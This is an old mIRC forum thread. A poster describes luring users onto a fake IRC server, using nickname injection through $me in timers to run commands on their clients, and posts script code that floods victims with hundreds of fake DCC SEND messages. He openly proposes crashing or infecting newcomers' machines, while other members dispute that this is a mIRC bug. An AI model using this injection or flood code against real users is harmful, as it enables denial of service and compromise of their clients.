|
|
Joined: Apr 2005
Posts: 10
Pikka bird
|
OP
Pikka bird
Joined: Apr 2005
Posts: 10 |
Stefys here. I can't say that's a mIRC bug, but that can crash n00bs computers. U create a fake irc server in sockets: After u put this in remote u type the following commands: -edit- Then all u have to do is to tell ppl join /server -m urip:1234 If they type the adduser thingy, the scid will be executed. U can put better commands in it, like some non-ending loops with opening some windows, to crash the windows, or u can infect his/hers mirc. Be carefully!
Last edited by Mentality; 10/04/05 01:13 PM.
|
|
|
|
|
Joined: Dec 2002
Posts: 2,962
Hoopy frood
|
|
Hoopy frood
Joined: Dec 2002
Posts: 2,962 |
I don't really know what you expect mIRC to do about that. Yes, if someone connects to a malicious server and is stupid enough to follow instructions to run commands on their computer that are clearly suspect without noticing that the server has changed their nickname to something obviously intended to do harm then bad things can happen.
Spelling mistakes, grammatical errors, and stupid comments are intentional.
|
|
|
|
|
Joined: Apr 2005
Posts: 10
Pikka bird
|
|
OP
Pikka bird
Joined: Apr 2005
Posts: 10 |
there are scripts who are using .timer 1 1 .. $me .. on connect... so they don't have to do any commands.
Command is not mallicious, it's just $me... in most times nothing can happen if u use $me
|
|
|
|
|
Joined: Dec 2002
Posts: 2,962
Hoopy frood
|
|
Hoopy frood
Joined: Dec 2002
Posts: 2,962 |
$me is an unsafe identifier to use within a multiple-evaluating command such as /timer at any time, regardless of a malicious server. Bad/insecure scripting is something mIRC simply has no control over.
Spelling mistakes, grammatical errors, and stupid comments are intentional.
|
|
|
|
|
Joined: Apr 2005
Posts: 10
Pikka bird
|
|
OP
Pikka bird
Joined: Apr 2005
Posts: 10 |
If i put some flood on the fakeserver, my mirc gets automatically infected cause of antif-flood security.
|
|
|
|
|
Joined: Jun 2003
Posts: 5,024
Hoopy frood
|
|
Hoopy frood
Joined: Jun 2003
Posts: 5,024 |
mIRC's code (just like most other scripting languages) can be used and twisted into being used in an abusive way in one way or another. That's a reasonably advanced way, $decode is another example of how people take advantage of other otherwise innocent features.
As has been said so many times, not just by us on this board, but by organisations world wide - users need to wake up and secure their own computers with the tools and assistance provided by other professionals - they cannot FORCE them to be knowledgeable. New people to mIRC may not know what's going on, but even though this involves mIRC, it goes beyond that - it's a matter of running something on your computer a stranger has told you to run that you don't understand. Khaled can't stop people doing that.
Regards,
Mentality/Chris
|
|
|
|
|
Joined: Apr 2005
Posts: 10
Pikka bird
|
|
OP
Pikka bird
Joined: Apr 2005
Posts: 10 |
or... u can put a mass-dcc sending with random files, random sizes, random nicknames and u MUST close the mirc. mirc should have some DCC MASS SENDING restrictions.
|
|
|
|
|
Joined: Dec 2002
Posts: 2,962
Hoopy frood
|
|
Hoopy frood
Joined: Dec 2002
Posts: 2,962 |
Eh? You can put mass DCC sending where?
Spelling mistakes, grammatical errors, and stupid comments are intentional.
|
|
|
|
|
Joined: Apr 2005
Posts: 10
Pikka bird
|
|
OP
Pikka bird
Joined: Apr 2005
Posts: 10 |
On the fake server... Look at this:
alias getrandc {
if (!$1) var %p = 1
else %p = $1
var %i = 1
while (%i <= %p) {
var %ret = %ret $+ $iif($r(0,1),$r(a,z),$r(0,9))
inc %i
}
return %ret
}
alias get1send {
return : $+ $getrandc(15) PRIVMSG * : $+ $chr(1) DCC SEND $getrandc(50) $+ . $+ $iif($r(0,1),.bmp,.txt) $r(1000000,9999999) $+ $chr(1)
}
ON FAKEIRC SERVER CONNECT BODY:
.timer 300 0 sockwrite -n $sockname $!get1send
When u connect to a fakeserver which sends u 300 dcc sends... u must close mirc To moderators/administrator: do not delete/edit the code pls.. it's inofenssive without the fakeirc server code DCC SENDS should be automatically ignored after 5 dccs on 3 seconds or something like this... My own script does that, but a normal mirc doesn't.
|
|
|
|
|
Joined: Apr 2005
Posts: 10
Pikka bird
|
|
OP
Pikka bird
Joined: Apr 2005
Posts: 10 |
Look what i did... I have a protection on my mIRC that does something like that:
mode $me +d
silence +*!*@*
.timer 1 10 mode [b]$me[/b] -d
.timer 1 10 silence -*!*@*
$me = $findfile(.,*,1,...) Then i make the fakeirc server to send flood thingy from random nicknames and from my nick, so some mircs will try to ignore itself. When i opened the server my anti-flood security started and i got hacked  ... but i fixed the bug for me now (i put $!me instead of $me), but i'm sure that this bug is on more scripts  .. it's not a mirc bug, but it is a problem
|
|
|
|
|
Joined: Sep 2003
Posts: 4,230
Hoopy frood
|
|
Hoopy frood
Joined: Sep 2003
Posts: 4,230 |
your being silly, its like saying firearms need special trigger locks built in, incase someone steals them, then they cant fire them, becuase otherwise there unsafe, well guess what, they are anyway, becuase they just got nicked.
Same thing with this, the users already been dupped into joining a fake server, whats mirc ment to do, protect him againest every stuipid act he might do, maybe it should have a in built ON TEXT match for credit card looking numbers and block them from being sent, maybe it needs a cybernanny built in incase someone sends a naughty website, I know lets have mirc not really connect to IRC at all that way we can be protected from everything irc can throw at us.
|
|
|
|
|
Joined: Apr 2005
Posts: 10
Pikka bird
|
|
OP
Pikka bird
Joined: Apr 2005
Posts: 10 |
|
|
|
|
|
